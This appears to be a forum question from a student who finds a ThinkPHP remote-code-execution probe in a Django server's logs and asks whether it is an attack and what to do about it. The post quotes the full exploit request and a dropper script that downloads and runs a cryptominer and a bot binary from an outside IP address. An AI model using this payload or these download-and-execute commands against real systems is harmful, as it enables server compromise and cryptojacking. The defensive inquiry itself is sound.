I developed a Django application for a school project and I hosted it on an EC2 instance to test and learn the environment.
During inspection of the logs, I found the following GET request,
"GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;chmod%20777%20ex.sh;sh%20ex.sh HTTP/1.1" 200 9472
This seems strange because I don't use PHP, I guess that someone assumed I use PHP, then tried to download and run a script ex.sh
from 205.185.113.123
. The content of that script is,
cd /tmp; wget http://205.185.113.123/mcoin; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=90; rm -rf RjsWs
cd /tmp; wget http://205.185.113.123/sefa.x86; chmod 777 sefa.x86; ./sefa.x86 xd
rm -rf ex.sh
Since I don't know web apps and security much, I have some questions,
- Is this an attack? If so, what is the name of this attack?
- Can this attack be adapted for Django instead of PHP?
- Is this normal for web apps? Do they always get these kind of requests?
- According to https://ipinfo.info/, the IP address is registered for a company called FranTech Solutions. Are they related to this attack?
- Is this illegal? If so, can I take legal action?